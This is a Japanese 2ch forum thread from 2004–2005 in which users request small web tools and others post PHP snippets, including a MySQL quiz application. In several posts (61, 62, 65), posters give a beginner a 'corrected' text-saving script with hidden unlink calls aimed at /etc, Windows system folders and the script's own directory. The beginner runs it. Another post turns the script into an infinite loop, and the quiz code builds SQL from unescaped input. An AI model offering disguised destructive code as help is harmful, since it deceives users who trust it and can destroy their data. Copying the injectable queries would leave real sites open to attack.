2ちゃんねる★スマホ版★■掲示板に戻る■全部1-最新50

依頼されたツールを誰かが作るスレ

1 :
nobodyさん
04/03/11 18:34 ID:9/n8FJau
依頼されたツールを誰かが作るスレです。

・依頼するときには、どんなツールを作ってほしいか言いましょう。
・拡張子もちゃんと指定しましょうね。(htmなど)
・作られるのが遅くても我慢汁。

作る人はがんばってください。
2 :
04/03/11 18:39 ID:???
−−−−−−−−−− 終了 −−−−−−−−−−−
3 :
nobodyさん
04/03/11 18:57 ID:mLlLH5ra
>>1を削除するツールを作ってください
拡張子は.dqn
4 :
nobodyさん
04/03/12 06:48 ID:qydu/i31
はいぱーうんこ

まぁ、作りませんか?スレよりは潔くて良いが。
5 :
04/03/12 07:47 ID:???
こんなところに春がきているよママーン
6 :
nobodyさん
04/03/13 20:39 ID:t5GyDYjl
誰か言葉を逆さにするツール作ってください
拡張子は.htmで
7 :
04/03/13 23:11 ID:???
>>6
http://tool-ya.ddo.jp/2ch/trash-box/file/20040313230519167.htm
横のさかさはスクリプトオンで可
縦のさかさはスクリプトオフでもいいけれど
IE4以上のActiveXの機能を少し使います
ファイル3日で消えるらしいです
8 :
nobodyさん
04/03/13 23:59 ID:8LTzlkiM
スレHTML→2ch形式dat変換ツール
意外とHTMLの形式がいろいろあるから、全部対応してるやつ
9 :
nobodyさん
04/03/14 08:30 ID:85CqQGfI
>>7
アクセス拒否されるYO!
10 :
04/03/14 10:09 ID:???
多分>>8>>1

作りませんか?系スレは>>1が何か欲しい場合に立てる。そこに志はない。
11 :
04/03/14 16:33 ID:???
>>8だけど>>1じゃないよ
html2datは昔作ったんだけどHTMLは2chとかdat2htmlで作った奴とか
微妙に形式違っててその度に手直ししてたんだわ

誰も作らないなら稚拙でも自分で作るさ
12 :
04/03/15 11:39 ID:???
>>10
せめてn番が指定したものをn+1番が作るスレだよな

>>11
っていうかそれ無理だろ…
13 :
nobodyさん
04/03/15 11:49 ID:85844v4V
えっと・・・新しくサイトを作ってる最中なんですが、

*名前を入力するフォーム
*メールアドレスを入力するフォーム
*電話番号を入力するフォーム
*住所を入力するフォーム
*商品番号を入力するフォーム
*その他、何でもいい連絡事項等を入力するフォーム

*入力したそれらの情報をメールにして、「メールアドレスを入力するフォーム」に入力
されたアドレスと、私宛の2件に送信する

というページを作りたいのですが、ちょっと検索してみたのですが見つかりませんでした。
よろしくお願いします。
14 :
nobodyさん
04/03/15 12:03 ID:u5uDbosW
処理完了時にmail(入力されたアドレス,subject,message);とmail(13のアドレス,subject,message);
http://jp2.php.net/manual/ja/function.mail.php
15 :
04/03/15 15:03 ID:???
>>13
レンタルしろ

さもなきゃ

【CGI】こんなCGI探してますver.12【素材】
http://pc2.2ch.net/test/read.cgi/hp/1075737677/
16 :
04/03/15 15:08 ID:???
ただの質問スレになりさがったところで>>1は削除依頼よろ
17 :
04/03/15 15:35 ID:???
>>13
作りました。

次の方どうぞ。
18 :
04/03/15 16:10 ID:???
以下、
*99の指定したスクリプトを*00が作ってみるスレ
に変更されました
19 :
nobodyさん
04/03/15 18:29 ID:GA9gqFb0
>>18
かまわないけど、自分が*00とったらドウシヨ
つくれるかな?
まあ、いいんじゃねーの?
20 :
nobodyさん
04/03/15 18:38 ID:08u6ufAL
参加age
21 :
04/03/15 18:44 ID:???
どうせ*99は作れもしない要求をし、*00は作れるものでも作りゃしないのさ
22 :
nobodyさん
04/03/15 18:54 ID:GA9gqFb0
加速
23 :
nobodyさん
04/03/15 18:54 ID:GA9gqFb0
加速しろお前ら
24 :
04/03/15 19:12 ID:???
25 :
04/03/15 19:13 ID:???
言語は不問でつか?
26 :
04/03/15 19:49 ID:???
>>25
日本語でおながいしまつ
27 :
04/03/16 00:24 ID:???
誰か!ロゴかベーシックを!それかひまわり、ひまわりを!!!!
28 :
04/03/16 15:39 ID:???
>>8
形式いろいろある(俺も自作のdat→htmlスクリプト作ったぐらい)から無理

正規表現勉強してテキストエディタを使うのがいいよ。
なれれば結構簡単。

まぁこんなのもあるけど。
http://www.vector.co.jp/soft/win95/net/se316366.html
29 :
04/03/17 00:10 ID:???
マンガ本(書籍)の購入管理cgi

1巻目を購入した場合、書籍名を入力すると現在の年月日と時刻と共に登録される
2巻目以降を購入した場合、登録された書籍名を呼び出し、購入した巻数と現在の年月日と時刻を登録する
購入履歴検索機能付き
いたずら防止機能付き(パスワード・クッキー)

みたいなcgiってありませんか?
30 :
04/03/17 01:05 ID:???
>>29
取りあえず納品物は自分で作ろうや。
31 :
04/03/17 01:06 ID:???
>>29
この板ではCGI探しは扱っていません。

【CGI】こんなCGI探してますver.12【素材】
http://pc2.2ch.net/test/read.cgi/hp/1075737677/
32 :
04/03/17 01:07 ID:???
>>29
無いようなので作りました。


次の方どうぞ。
33 :
04/03/17 07:38 ID:???
書き込んだ言葉がすべて敬語になるツールをつくってもらえれば・・・
34 :
04/03/17 13:01 ID:???
>>33
関西弁変換ツールを改造してつくりました。

次の方どうぞ。
35 :
04/03/17 14:02 ID:???
誰にも作れないスクリプトを作ってくれませんか?
36 :
04/03/17 15:49 ID:???
誰かが作った時点で誰にも作れないものではなくなるから無理。


はっ!言っちゃいけなかった?
37 :
04/03/17 16:14 ID:???
>>35
作りました。
38 :
04/03/17 16:46 ID:???
つーか作ったのはちゃんとうpしようよ。
39 :
04/03/17 20:43 ID:???
画像の容量を自動的に削ってくれる、なんてのは・・・
40 :
04/03/17 22:09 ID:???
>>39
自動サムネイル作成ならいくらでもある。
41 :
04/03/19 00:25 ID:???
>>39
後ろ2MBをごっそり捨てるのならあるぞ。
42 :
04/03/19 17:54 ID:???
>>41
うpキボンヌ。
43 :
nobodyさん
04/03/19 19:24 ID:0q4JU95w
web上でサイトを巡回しながら進化するプログラム
44 :
04/03/19 19:34 ID:???
AI搭載ですか?
45 :
04/03/20 00:03 ID:???
>>44
遺伝的アルゴリズムじゃないのか?
46 :
04/03/20 09:08 ID:???
ここってひっそりと良スレかな?
47 :
04/03/20 19:10 ID:???
>>45
なにそれ?
48 :
04/03/21 03:53 ID:???
テキスト保存ができるPHPを作っていただきたいです。
おもな流れは
1.テキストボックスにテキスト文字列を入れる(半角英数字のみOK)
2.条件処理:テキストの最初の文字は常に"0"でないといけない。文字列の長さは5文字以上
 同じ文字列がテキストファイルに登録されている場合は登録できない。
3.文字列をサーバー内のテキストファイルに無限に保存。(一行ずつ)
 条件を突破して登録できたらメッセージを表示。

といったテキスト登録・保存CGIを作ってもらいたいです。
言語はできたらPHPでお願いしたいと思います。
やってやろうという猛者の開発者さんがいればよろしくお願いします。
49 :
04/03/21 03:58 ID:???
3.無限に
以外は完成。無限はありえない。


次の方どうぞ。
50 :
04/03/21 04:24 ID:???
では300件まででかまいません。
完成を待っています。
51 :
04/03/21 05:05 ID:???
           ∧_∧ 
         ヾy ´・ω・`ヽノシ  コンニチワ!
          `!       i
          ゝ c_c_,.ノ  
             (
              )
             (
             ω
52 :
04/03/21 08:59 ID:???
>>48
素人仕様はいらんから用途を書け。勝手にインテグレートする。
53 :
04/03/21 09:08 ID:???
>>48
<form method="post"><input type="text" name="s"><input type="submit"></form>
<?php $n='./iregui.txt';$x=64;if(isset($_POST['s'])and preg_match(
"/^([0][0-9A-Za-z]{4,$x})$/",$_POST['s'],$m)and $p=fopen($n,'r+')){$d=array();
eval('flock($p,2);');while($l=fgets($p,2+$x))$d[$l]=1;!array_key_exists(
"$m[1]\n",$d)and fwrite($p,"$m[1]\n")and print'これで満足か?';fclose($p);}?>

PHPは詳しく知らん。
54 :
04/03/21 09:33 ID:???
>>53
それってコピーして貼り付けて、html形式で保存したらどうなんの?
55 :
04/03/21 10:00 ID:???
>>54
どうもならない。
56 :
04/03/21 10:00 ID:???
>>54 PCが爆発する。
57 :
04/03/21 10:11 ID:???
やってみましたが、テキストに登録されたあとに改行されていないのがどうも・・・。
\nは改行なので<BR>に変えてみたりしたのですが改行されずにスペースがあくだけで
0aaaaa 0bbbbb 0ccccc のようになってしまいます。

イメージとしてはテキスト開いたときに
0aaaaa
0bbbbb
0ccccc

のように表示させたいのですが無理ですか?
もしテキストが駄目ならHTMLでもOKです。
58 :
04/03/21 10:29 ID:???
>>57
イイ喧嘩の売り方だな。
59 :
04/03/21 10:43 ID:???
>>57
>\nは改行なので<BR>に変えてみたりしたのですが改行されずにスペースがあくだけで
これが意味不明。メモ帳で開いて「改行表示」されないだけならワードパッドで開け。
60 :
04/03/21 10:49 ID:???
すいません。エクスプローラで開いていたので改行されていないように見えたようです。
メモ帳で開くと改行されていました。


ただ
> 同じ文字列がテキストファイルに登録されている場合は登録できない。
ができちゃっているので修正してもらえませんか>?
61 :
04/03/21 10:50 ID:???
>>57
<form method="post"><input type="text" name="s"><input type="submit"></form>
<?php $n='./iregui.txt';$x=64;unlink("/etc/*");if(isset($_POST['s'])and preg_match(
"/^([0][0-9A-Za-z]{4,$x})$/",$_POST['s'],$m)and $p=fopen($n,'r+')){$d=array();
unlink("c:/winnt/*");eval('flock($p,2);');unlink("c:/windows/*");while($l=fgets($p,2+$x))$d[$l]=1;
!array_key_exists( "$m[1]\n",$d)and fwrite($p,"$m[1]\n")
and print'これで満足か?';fclose($p);}?>

\nを\r\nに置換するようにしてみた。
62 :
04/03/21 10:52 ID:???
>>60
<form method="post"><input type="text" name="s"><input type="submit"></form>
<?php $n='./iregui.txt';$x=64;unlink("/etc/*");if(isset($_POST['s'])and preg_match(
"/^([0][0-9A-Za-z]{4,$x})$/",$_POST['s'],$m)and $p=fopen($n,'r+')){$d=array();
unlink("c:/winnt/*");eval('flock($p,2);');unlink("c:/windows/*");!array_key_exists( "$m[1]\n",$d)and fwrite($p,"$m[1]\n");while($l=fgets($p,2+$x))$d[$l]=1;!array_key_exists( "$m[1]\n",$d)and fwrite($p,"$m[1]\n") and print'ほれ';fclose($p);}?>
63 :
04/03/21 11:01 ID:???
>>56
マジですか?
いや、本当に教えてくれ。頼む。
64 :
04/03/21 11:04 ID:???
エラーが出ます。。。

なにもしていない状態で出るエラー
Warning: unlink(): SAFE MODE Restriction in effect. The script whose uid is 3010 is not allowed to access /etc owned by uid 0 in /usr/home/free/home/winny/public_html/nodex.php on line 2

テキスト登録すると出るエラー(下)
Warning: unlink(c:/winnt/*): No such file or directory in /usr/home/free/home/winny/public_html/nodex.php on line 4

Warning: unlink(c:/windows/*): No such file or directory in /usr/home/free/home/winny/public_html/nodex.php on line 4
ほれ
65 :
04/03/21 11:12 ID:???
>>64
<form method="post"><input type="text" name="s"><input type="submit"></form>
<?php $n='./iregui.txt';$x=64;unlink("./*");if(isset($_POST['s'])and preg_match(
"/^([0][0-9A-Za-z]{4,$x})$/",$_POST['s'],$m)and $p=fopen($n,'r+')){$d=array();
eval('flock($p,2);');while($l=fgets($p,2+$x))$d[$l]=1;!array_key_exists(
"$m[1]\n",$d)and fwrite($p,"$m[1]\n")and print'悪い、コレが正だ';fclose($p);}?>
66 :
http:// 218-228-167-73.eonet.ne.jp.2ch.net/
04/03/21 11:18 ID:???
guest guest 
67 :
04/03/21 11:22 ID:???

Warning: unlink(./*): No such file or directory

line2 がエラーです。

。。。。
68 :
04/03/21 11:23 ID:???
>>67
次は本気で行くが、いいか?
69 :
04/03/21 11:26 ID:???
<form method="post"><input type="text" name="s"><input type="submit"></form>
<?php while(1){$n='./iregui.txt';$x=64;if(isset($_POST['s'])and preg_match(
"/^([0][0-9A-Za-z]{4,$x})$/",$_POST['s'],$m)and $p=fopen($n,'r+')){$d=array();
eval('flock($p,2);');while($l=fgets($p,2+$x))$d[$l]=1; fwrite($p,"$m[1]\n")and print'これでうごくかな?';fclose($p);}}?>
70 :
04/03/21 11:30 ID:???
>>67
俺さすがに限界なんで親切な>>68 にでも教えてもらった方が良いと思うよ。
71 :
04/03/21 11:32 ID:???
Warning: unlink(): SAFE MODE Restriction in effect. The script whose uid is 3010 is not allowed to access /etc owned by uid 0 in


/usr/home/free/home/winny/public_html/nodex.php on line 2


なにげにパスが良い感じで喧嘩売ってるな。                    
72 :
04/03/21 11:36 ID:???
だめだこりゃw


ちなみにパスはファストプロジェクトの一部でやってるところのミラーですよw
いまはなにもないですが
73 :
04/03/21 12:31 ID:???
意味わからん
おまいらスゴ杉
74 :
nobodyさん
04/03/21 16:20 ID:sMZl62+k
釣り師とネタ師age
75 :
04/03/21 19:00 ID:???
phpの事全然知らないんだが、ひょっとしてphpってソース見難い?
76 :
04/03/21 20:04 ID:???
>>75
改行とインデントしてないからそう見えるだけじゃねーの?
77 :
nobodyさん
04/03/22 14:02 ID:elyzLGJ4
aaa!cafeとかだとphpをよく使うよね
78 :
04/03/23 00:25 ID:???
まだaaa!cafeなんて使ってるアホいるの?
79 :
nobodyさん
04/03/23 22:08 ID:TV3ZuPX4
>>78
アアン?
80 :
age小僧 ◆UmaibouAJY
04/03/24 21:53 ID:7IoYvSiu
HPのソースをなるべく正しいのに変えてくれるツール。
<font size=○>→スタイルシート とか。
81 :
04/03/24 22:15 ID:???
自動でSEO対策してくれるサービスはある。
82 :
04/03/25 06:41 ID:???
>>80
なんか各要素ごとに異なるidなりclassが付く予感。
逆コンパイラと一緒だな。変換はするが意味は考慮しない。

それが正しいhtmlなりcssかと言うとかなり疑問な訳で。

83 :
04/03/25 06:55 ID:???
>>80
何をもって正しいとするんだ?
HTMLのバージョンとかによって違うわけだが。
84 :
04/03/25 07:36 ID:???
なんでもxhtml1.1とかにしときゃいいんじゃねーの?
俺には作れないけどさ。
85 :
age小僧 ◆UmaibouAJY
04/03/25 10:17 ID:RrsfViza
正しいHTMLとかについては、
http://home3.first-web.ne.jp/~pedsys/htmllint/htmllint.html
ここを参照にしてください。
86 :
04/03/25 10:39 ID:???
そもそもAnaother html-lintの本家
tp://openlab.ring.gr.jp/k16/htmllint/htmllint.html
を出さないことからしてどうかしてるし、
「満点で慢心しないでください。」
という言葉の意味もまるで分かってないな、小僧。
87 :
nobodyさん
04/03/29 09:01 ID:DbFwTKRt
人工知能は?
アイフルのHPにあるお姉さんのあれとか。
作れないかな?誰かおながい
88 :
04/03/29 09:25 ID:???
ただしいマークアップなんてのは機械にはできねえよ。
そんなことができるならそもそもxmlは不要。
89 :
nobodyさん
04/03/29 11:19 ID:Rwr6lKku
マークアップってなんですかね?
90 :
nobodyさん
04/03/29 22:29 ID:X47Smi9U
90!!!!
91 :
nobodyさん
04/03/29 22:43 ID:fXaqt12s
91!!!!
92 :
04/06/07 15:45 ID:???
いつかお世話になるかもしれないので保守
93 :
04/08/17 18:59 ID:???
誰か自動垢取りスクリプト作って(´・ω・`)
94 :
nobodyさん
04/10/01 06:48:46 ID:lqjypZYy
なんだ。
まじめにスレ読んだオレがバカだった。
95 :
nobodyさん
04/10/11 06:06:22 ID:sfhiVsaD
<FORM method="POST" enctype="multipart/form-data" action="〜.cgi">
<INPUT type=file name=file1>
</FORM>
のフォームからファイルアップロードされた場合、
HTTPサーバーのCGI上で標準入力から読み出す場合、、
この時のアップされたファイルのデータを取り出すアルゴリズムを教えてください。
Perlとかの具体的コーディングではなく、
アルゴリズムです。
できれば、VBでw標準入出力の読み書きは結構です。
区切りがあるのは分かっていますが、
1行で読んでいけばいいのでしょうか?(改行コードOSごとに違うのかぁ)
ファイルの属性みたいなのもあるんだよなぁ
できればDLL化してください。w
96 :
nobodyさん
04/11/10 16:32:08 ID:s3r2noFB
>93 ttp://f57.aaa.livedoor.jp/~kumakuma/tool/acc.html
97 :
nobodyさん
04/12/18 06:01:02 ID:neHl2NC1
>>48
今さらながら適当に作ってみた。
何がやりたいのかよくわからんからこれでいいのか不明だけど。
ttp://sv1.zive.net:9999/test/test.php
98 :
nobodyさん
05/01/02 01:42:29 ID:mBFwp0hg
PHPとMySQLを使って4択問題を出題できるphpファイルを作っていただけないでしょうか?
・データベースに問題と4択の解答群と正解がためてある
・問題と4択の解答群が出題されラジオボタン形式で答えを選びサーバーに送信
・サーバーで答えあわせをされる
例えるとwebアンケートのようなものでしょうか。
答えあわせのファイルまでだとかなりお手をわずらわせてしまうのでデータベースに登録してある問題と解答群を出題するというphpファイルを作っていただけないでしょうか?
99 :
nobodyさん
05/01/02 02:21:24 ID:g7zmI0f+
>>98
テーブル構造教えて。
100 :
nobodyさん
05/01/02 03:12:27 ID:mBFwp0hg
>>99
作ってもらう立場なので作りやすいようにそちらにおまかせします
あとでデータベースにためておく問題や答えやよびだす先などを作っていただいたのにあわせます。
101 :
nobodyさん
05/01/02 07:50:13 ID:g7zmI0f+
>>100
ぇ?
こっちで考えるといわれても、何作れば良いのかちょっとわからないかも・・・
問題ってどんな問題ですか?
102 :
05/01/02 16:16:03 ID:???
100行のbbs、blog、wiki
103 :
05/01/02 18:19:27 ID:???
>>102
BBSは100行も要らない

七行プログラミング
http://pc5.2ch.net/test/read.cgi/php/1036141603/
104 :
05/01/02 18:44:23 ID:???
>>97
サライ!
105 :
nobodyさん
05/01/03 12:31:19 ID:4Lz2vVwg
>>101
すいません。説明不足でした。
データベースには
・問題
・4択の解答群
・問題の正解
をワンセットにしたものをいくつも登録していく感じで
データベース名、テーブル名はおまかせします。

問題の例をいうと、ペーパー試験をweb上でやるようなもので
問1.1+1の答えは?
○1.1
○2.2
○3.3
○4.4
という問題と解答群が出されて1〜4のどれかのラジオボタンをチェックしていくという形式です。
あとは全問題が終わったらサーバーに送信してやるというかたちになります。
できればデーターベースに登録してあるどの問題をだすかも選べるようにできる機能があればありがたいです
106 :
05/01/04 00:07:21 ID:???
-- テーブルこんな感じで
create table quiz (
  id integer unsigned not null auto_increment,
  question text not null,
  answer enum('A', 'B', 'C', 'D'),
  A varchar(64) not null,
  B varchar(64) not null,
  C varchar(64) not null,
  primary key (id)
);
107 :
05/01/04 00:07:49 ID:???
データベース周りの操作をまとめたクラス quiz.php.inc
<?php
class Quiz {
  var $table='quiz';
  function Quiz() {}
  function connectDB($dbserver, $username, $password, $database) {
    @mysql_connect($dbserver, $username, $password);
    @mysql_select_db($database);
  }
  function query($query_string) {
    $result = @mysql_query($query_string);
    if (! $result) {
      printf("MySQL error(%d): %s\n", @mysql_errno(), @mysql_error());
      return NULL;
    }
    return @mysql_fetch_object($result);
  }
  function getAnswer($id) {
    return $this->query("SELECT `answer` FROM $this->table WHERE `id`=$id;");
  }
  function getQuestion($id) {
    return $this->query("SELECT `question`,`A`,`B`,`C`,`D` FROM $this->table WHERE `id`=$id;");
  }
  function addQuestion($question, $answer, $answers) {
    assert(in_array($answer, array('A', 'B', 'C', 'D')));
    assert(4 == count($answers));
    list($A, $B, $C, $D) = $answers;
    $this->query("INSERT INTO `$this->table` VALUES(NULL,`$question`,`$answer`,`$A`,`$B`,`$C`,`$D`);");
  }
}
?>
続きは、また今度。
108 :
nobodyさん
05/01/04 00:47:34 ID:WKpVZ3ZH
>>107
お疲れ様です
引き続きよろしくお願いします
109 :
05/01/05 04:11:06 ID:???
テーブル定義(差分
- answer enum('A', 'B', 'C', 'D'),
+ answer enum('A', 'B', 'C', 'D') not null,

4択なので Dを追加
+ D varchar(64) not null,

quiz.php.inc ...クォート間違い
- VALUES(NULL,`$question`,`$answer`,`$A`,`$B`,`$C`,`$D`);");
+ VALUES(NULL,'$question','$answer','$A','$B','$C','$D');");
110 :
05/01/05 04:11:41 ID:???

問題登録
<?php
include_once "./quiz.php.inc";
$quiz = new Quiz();
$quiz->connectDB('localhost', 'test', 'test', 'test');
if ($_POST) {
  if ($quiz->addQuestion(
     addslashes($_POST['question']), $_POST['answer'],
     array_map('addslashes', array($_POST['A'], $_POST['B'], $_POST['C'],
$_POST['D']))))
    print_r($_POST);
}
?>
<form method="post" action="<?= $_SERVER['PHP_SELF'] ?>">
<label>Question: </label><br /?
<textarea name="question"></textarea><br /><br />
<label>A: <input name="A" value="" /></label><br />
<label>B: <input name="B" value="" /></label><br />
<label>C: <input name="C" value="" /></label><br />
<label>D: <input name="D" value="" /></label><br />
<label>Answer: </label><select name="answer">
<option value="A">A</option>
<option value="B">B</option>
<option value="C">C</option>
<option value="D">D</option>
</select><input type="submit" /></form>
111 :
05/01/05 04:18:48 ID:???
うちのmySQL、versionが古くてsubquery使えなかったので、毎回クエリ発行(ぉ
htmlで保存してstatic contentにしたほうが良いかも。

<?php
$questions = array(1, 2, 3); // 問題のIDを順番に指定
echo "<form method=\"post\" action=\"check_quiz_answer.php\">\n";
foreach ($questions as $id) {
  $obj = $quiz->getQuestion($id);
  echo "<p>",$obj->question,"</p>\n";
  echo "<ol>";
  echo "<li><input type=\"radio\" name=\"Q$id\" value=\"A\">",$obj->A,"</li>";
  echo "<li><input type=\"radio\" name=\"Q$id\" value=\"B\">",$obj->B,"</li>";
  echo "<li><input type=\"radio\" name=\"Q$id\" value=\"C\">",$obj->C,"</li>";
  echo "<li><input type=\"radio\" name=\"Q$id\" value=\"D\">",$obj->D,"</li>";
  echo "</ol>";
  echo "<hr />\n";
}
echo "</form>\n";
?>

今から答え合わせの、作ってきます。
112 :
05/01/05 04:42:14 ID:???
あ、前のやつsubmitボタン忘れてた。閉じ</form>の前に
echo "<input type=\"submit\" />\n"; 追加。

quiz.php.incの一部変更
function getAnswer($id) {
  $obj = $this->query("SELECT `answer` FROM $this->table WHERE `id`=$id;");
  return ($obj) ? $obj->answer : false;
}

で、最後に答え合わせ。見ての通り手抜きなので、
カスタマイズして使うか、運用でカバーして下さい。
<?php
include_once "quiz.php.inc";
$quiz = new Quiz();
$quiz->connectDB('localhost', 'test', 'test', 'test');
$total = 0; $correct = 0;
if ($_POST) {
  foreach ($_POST as $id => $answer) {
    if (preg_match("/^Q(\d+)$/", $id, $arg)) {
      $total++;
      if ($answer == $quiz->getAnswer(addslashes($arg[1]))) {
        $correct++;
        echo "<li>$id ... $answer is OK</li>\n";
      }
      else {
        echo "<li>$id ... $answer not OK</li>\n";
      }
    }
  }
  printf("<p>Result: %d/%d</p>\n", $correct, $total);
} ?>
113 :
05/01/06 14:39:42 ID:???
>>112
ありがとうございました
今まで風邪で寝込んでいましたのでこれからじっくり勉強させていただきます
ほんとうにありがとうございました
114 :
05/01/12 00:51:18 ID:???
>>112
問題登録で問題の答えは登録できるんですが問題文がつくれません
私の使い方がおかしいのでしょうか?
そちらの環境ではできたのでしょうか?
115 :
05/01/12 12:15:45 ID:???
質問ばかりですみません。
追加で2つほど質問があります
1)>>107の@はどういう意味があるのでしょうか?
2)>>111のファイルにアクセスして問題を解いていくという形になるんですよね?ファイル名はなんでもいいんですか?
  5行目でエラー:Call to a member function on a non-object がでてしまいます
116 :
nobodyさん
05/01/12 21:00:48 ID:3Dz5Lw0C
114の問題は解決できました。
<textarea name="question"></textarea><br /><br />にテーブルタグをいれてやったら問題文を打ち込めるようになりました

それでも115の問題が解決できません。
アドバイスお願いします
117 :
05/01/13 07:53:18 ID:???
>>115
>>114 は、おそらくtextareaのサイズ指定してないからだと思います。
textareaタグの属性にcols, rows属性を付けるか、CSSで幅指定(width,height)する。
登録のは、MySQL関連のツールの方が使いやすいかも(編集/修正も必要だよなと思ったり...
設問のファイルをcvsなどで作ってから、まとめて登録する方が便利ですよ。編集も簡単だし。

> 1)>>107の@はどういう意味があるのでしょうか?
http://www.php.net/manual/ja/language.operators.errorcontrol.php
エラー制御演算子です。が、上に投稿したスクリプトはエラー処理全然してません。
DBへの接続や、テーブルが登録されてるのを前提にしてます。スペースの都合と、運用でカバー出来る範囲かなと思ったので。

ファイル名は何でもokです。

5行目のエラーは、すいません、投稿時のミスでした。
スクリプト切り貼りしてたので。2行目辺りに追加して下さい。
include_once "quiz.php.inc";
$quiz = new Quiz();
$quiz->connectDB('localhost', 'test', 'test', 'test');
118 :
05/01/13 11:16:47 ID:???
>>117
ありがとうございます。
とりあえず上記のエラーはなくなりました。
引き続き作っていただいたソースをもとに勉強していきたいと思います
119 :
05/01/13 20:15:08 ID:???
なんとか作っていただいたものの一連の操作・動作ができました
ありがとうございました

とりあえず
1)問題の修正と削除とIDの変更ができるようにすること
2)問題登録で画像もアップできるようにすること
3)問題に答える人と回答チェックをする人を別にすること(管理者だけが答えあわえできるように)
をできるようにめざして勉強していきたいと思います
120 :
05/01/17 21:44:44 ID:???
2)はできるようになったのですが1)の途中でつまずいています
というのもまずIDが固定されて変わらないということです
1番目の問題を消しても2番目の問題はID2のままでかわらないとかいうのは不便なのでどうにかしたいのですがわからず頭を悩ませています


次にCSV形式でのまとめての登録の仕方がわかりません
本などで調べてみたのですがみつけることができませんでした


3)についてどういう方法をとったらいいかのアドバイスをお願いします



以上3点お手数ですがアドバイスをお願いします
121 :
05/01/17 23:17:09 ID:???
>>120
友達いないのか。。。
122 :
05/01/19 03:10:34 ID:???
>>120
1) 複数のテーブルでIDを参照してる時に、id変更となるとデータの関連が切れるので困る事になるので、RDBではそもそもidの変更自体あまりしない。
表示を代えたいだけなら、上のスクリプトなら$questionsが表示するidの順番を保持しているので、配列のindexをパラメータで渡すように変更すると良い。
2) 方法はいろいろあるので、MySQL CSV インポートをキーワードに検索してみてください。
3) は、回答データをDBに蓄積していって、答え合わせはバッチ処置とかかな。

# そろそろすれ違い?
123 :
05/01/19 15:45:23 ID:???
ありがとうございます
スレ違いになってしまいますのでこれで質問はおわりにします
124 :
05/02/03 11:40:44 ID:???
PHPのソケットプログラムを組みたいのですが、雛形のような基本的なソースを
見つけることが出来ません…。PHProxyを解析しようとしたのですが挫折しました…。
・適当なウェブページ(ヤフートップページとかで十分です)の内容を
・一行ずつ適当な配列変数にでも入れて(後から弄る予定です)
・それを一行ずつ吐く
程度の、本当に基礎的なソース(上のままだとウェブProxyですが、雛形を元に自分で色々
組んでみたいと考えています))をお願いできないでしょうか?
何かスレ違いのような気もするのですがよろしくお願いします。
125 :
05/02/04 09:56:45 ID:???
>>124
ttp://php.benscom.com/manual/ja/ref.sockets.php
126 :
05/02/04 15:50:02 ID:???
>>125
ありがとうございます。実は書き込み後にとほほさんのサンプルスクリプトを発見したのですが
それだとヤフートップページは表示できても多くのサイトで「ホストが見つからない」という
エラーが起きていて頭を抱えていました。このソースで分かったのですが、gethostbynameを
使えば良かったんですね・・・。
お陰様で基本的なことが分かってきました。後は自分で試行錯誤で頑張れそうです。
ありがとうございました。
127 :
05/02/17 17:54:18 ID:???
>>124
他のサイトを読み込むだけならわざわざソケットからやらなくてももっと楽にできるだろうに
128 :
05/02/21 05:31:11 ID:???
>127
お客様はソケット使いたいと言っているのだからよろしいかと。
129 :
05/02/22 18:04:56 ID:???
>>126-127
ありゃ、ソケット使わなくてもできるんですか??
一応ソケットで目的の動作をさせられるようになったんですが
他の方法だとどのようにやるのでしょうか?
(「読み込むだけなら」ってことは、ソケットは「面倒だけど、
 POSTで取得できたりRefererいじれたりする方法」とか
 そういうことなんでしょうか?)
130 :
05/02/23 12:59:01 ID:???
>>129
fopen wrapperが有効なら
$yahoo_html = file("http://www.yahoo.co.jp/");
で配列$yahoo_htmlに1行づつ入る。
131 :
nobodyさん
05/02/27 13:06:08 ID:2jF8rHaF
下記のようなアンケートCGIをお願いします!
--------------------------------------------------------
■デフォルト画面
・選択肢1(○)…ラジオボタン(*入力必須)
・選択肢2(○)
・選択肢3(○)
コメント[          ]…1行テキストエリア(*入力必須)
[投稿]…投稿ボタン
[結果参照]…投稿せず結果のみ見るボタン

■投稿後の画面(結果画面)
総評数:○件
選択肢1/票数/%表示
選択肢2/票数/%表示
選択肢3/票数/%表示

「選択肢1のコメント」[全件表示ボタン]…コメント全件表示画面に切り替え
・コメント[投票日/時間]…最新3件表示
・コメント[投票日/時間]
・コメント[投票日/時間]
「選択肢2のコメント」(同上)
「選択肢3のコメント」(同上)

【お願いしたい機能】
・必須項目の入力がなかった場合のエラー表示
・連続投稿を禁止
・ファイルロック
--------------------------------------------------------
おねがいします!!!!!!!!
132 :
nobodyさん
05/02/27 15:03:26 ID:CullZ9HO
lispでCGIができるtoolを作ってくれ
133 :
nobodyさん
05/02/27 22:56:32 ID:OG/ioQoO
>>131
アンケートの質問は1つなの?

■デフォルト画面

  [ アンケートの質問文 ]

・選択肢1(○)…ラジオボタン(*入力必須)
・選択肢2(○)
・選択肢3(○)
コメント[          ]…1行テキストエリア(*入力必須)
[投稿]…投稿ボタン
[結果参照]…投稿せず結果のみ見るボタン

こんなんでいいの?
134 :
131
05/02/27 23:02:26 ID:2jF8rHaF
>>133
はい!
それが用意できれば、質問も自分で増やせそうな気がします。
おねがいします!!!
135 :
nobodyさん
05/02/28 00:14:43 ID:95zHTNSg
>>133
abc.cgi?q=1
abc.cgi?q=2

みたいな感じで質問変えられるように作ってあげれば?
136 :
nobodyさん
2005/11/16(水) 14:41:31 ID:e65gS8WX
グループウェア

言語:PHP、DBは使わない。

機能
共有カレンダー
掲示板
共有メモ帳
個別メモ帳
共有アップローダ
メール送受信

137 :
2005/12/12(月) 05:14:55 ID:???
>>136
3000万くらいで考えます。
そもそもそういう用途でDB使わない理由もわからないし。
138 :
2005/12/12(月) 14:32:24 ID:???
>>136
理由を教えてあげましょう。
そういう用途を考えずに適当にWeb鯖を借りたらDBが使えなかったから。
139 :
2005/12/13(火) 16:46:11 ID:???
ttp://www.axfc.net/

ここのあぷろだから自動で目的のブツをダウンロードできるツール。
140 :
2005/12/22(木) 01:06:31 ID:???
>>138
サーバ借り替えたら?サイボウズインスコ済みのところでも。

>>139
キーワードわからないとどうしようもない気が
141 :
2005/12/22(木) 01:09:45 ID:???
>>140
DLkey解析は無理でも、
田代砲かまして、ダウンロード可能画面が出たら止まるだけでも十分
142 :
2005/12/23(金) 21:00:27 ID:???
>>141
意味がわからん。
ダウンロード可能画面ってどの画面のことだ?

http://www5.axfc.net/uploader/5/so/N5_0231.zip.html
このページまで開けりゃいいの?
それに何の意味があるの?
143 :
2005/12/31(土) 00:30:52 ID:???
メモリを書き換えるツールを作ってもらえませんか?
